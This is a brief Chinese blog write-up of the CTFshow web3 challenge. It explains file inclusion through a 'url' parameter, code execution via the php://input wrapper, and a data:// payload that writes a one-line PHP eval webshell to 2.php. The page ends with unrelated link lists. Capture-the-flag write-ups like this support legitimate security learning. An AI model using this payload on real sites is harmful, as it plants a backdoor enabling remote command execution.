当前位置: 首页 > news >正文

CTFshow web3

news 来源:原创 2025/6/3 0:22:07

文件包含和伪协议

用GET传入一个URL值,/?url=文件路径

伪协议php://input 用来执行PHP代码,将POST请求当作PHP代码执行

测试一下,可以正确解析

拿到FLAG

还有一种解法,写入一句话木马

#Payload
#把一句话木马写入2.phpdata://text/plain,<?php fputs(fopen('2.php','w'),'<?php @eval($_POST["cmd"]);?>');?>

函数fputs将内容写入到指定文件,函数fopen打开文件,若没有就创建

把Payload放在/?url=后面,再访问/2.php

但不知为什么连不上

相关文章:

  • python笔面试题汇总
  • Hive数据倾斜问题深度解析与实战优化指南
  • OpenWebUI(1)源码学习构建
  • Apache SeaTunnel 引擎深度解析:原理、技术与高效实践
  • DDP与FSDP:分布式训练技术全解析
  • 数据基座觉醒!大数据+AI如何重构企业智能决策金字塔(下)
  • 56、Ocelot 概述
  • 「Java教案」Java程序的构成
  • 改进自己的图片 app
  • Visual Studio+SQL Server数据挖掘
  • 尚硅谷-尚庭公寓部署文档
  • 前端antd,后端fastapi,解决文件上传
  • html中使用nginx ssi插入html
  • 从一到无穷大 #46:探讨时序数据库Deduplicate与Compaction的设计权衡
  • 机器学习与深度学习05-决策树01
  • 2.测试项目启动和研读需求文档
  • 神经网络-Day40
  • phpmyadmin
  • 一套qt c++的串口通信
  • WindowServer2022下docker方式安装dify步骤
  • 怎么给制作网站谷歌地图/甲马营seo网站优化的
  • 石家庄做手机网站建设/百度浏览器
  • 做平台的网站有哪些功能吗/百度搜索量怎么查
  • 网站建设的工期拖延如何解决/如何通过网络营销自己
  • 如何做网站流量分析/曲靖新闻今日头条
  • 商务网站的主要存在形式/商丘seo教程